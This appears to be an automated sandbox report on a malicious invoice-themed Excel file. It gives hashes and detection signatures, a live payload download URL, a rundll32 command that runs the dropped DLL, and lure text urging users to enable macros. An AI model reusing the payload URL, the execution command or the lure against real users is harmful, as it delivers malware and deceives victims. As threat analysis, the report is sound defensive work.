Play interactive tour

Edit tour

Analysis Report 1A8C92C-1A8C92C.xls

Overview

General Information

Sample Name:	1A8C92C-1A8C92C.xls
Analysis ID:	383028
MD5:	d8ed80402de2b621219044b3a2c022c5
SHA1:	e2f86c9431081da7f57cc014a9f2f7b870ea0aad
SHA256:	d98b11f1599985cc16c8dd10ea53ea5a1b9ac752d5d30c460c198b4a2a83ad9b
Tags:	Invoicexls
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Document exploit detected (drops PE files)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 1908 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

rundll32.exe (PID: 4264 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 5620 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
1A8C92C-1A8C92C.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x12ebb:$e1: Enable Editing 0x12c05:$e3: Enable editing 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://revolet-sa.com/files/countryyelow.php

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://revolet-sa.com/files/countryyelow.php

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: 1A8C92C-1A8C92C.xls

Virustotal: Detection: 21%

Perma Link

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: k9G1a[1].fbx.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Source: global traffic

DNS query: name: revolet-sa.com

Source: global traffic

TCP traffic: 192.168.2.6:49715 -> 192.232.249.186:80

Source: global traffic

TCP traffic: 192.168.2.6:49715 -> 192.232.249.186:80

Source: Joe Sandbox View

IP Address: 192.232.249.186 192.232.249.186

Source: global traffic

HTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: revolet-sa.comConnection: Keep-Alive

Source: global traffic

Source: unknown

DNS traffic detected: queries for: revolet-sa.com

Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.office.net
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://augloop.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cdn.entity.
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cortana.ai
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://cr.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://directory.services.
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://graph.windows.net
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://login.windows.local
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://management.azure.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://management.azure.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://tasks.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 8	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. tSi Protected View Thi
Source: Screenshot number: 8	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 12	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. tSi Protected View Thi
Source: Screenshot number: 12	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: 1A8C92C-1A8C92C.xls	Initial sample: EXEC
Source: 1A8C92C-1A8C92C.xls	Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\sdbybsd.fds			Jump to dropped file

Source: 1A8C92C-1A8C92C.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox View	Dropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1

Source: 1A8C92C-1A8C92C.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: classification engine

Classification label: mal100.expl.evad.winXLS@5/9@1/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{8643C10B-2E72-4F73-AB9B-C8EEF8C034D2} - OProcSessId.dat

Jump to behavior

Source: 1A8C92C-1A8C92C.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW

Source: 1A8C92C-1A8C92C.xls

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_04DC1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

1_2_04DC1030

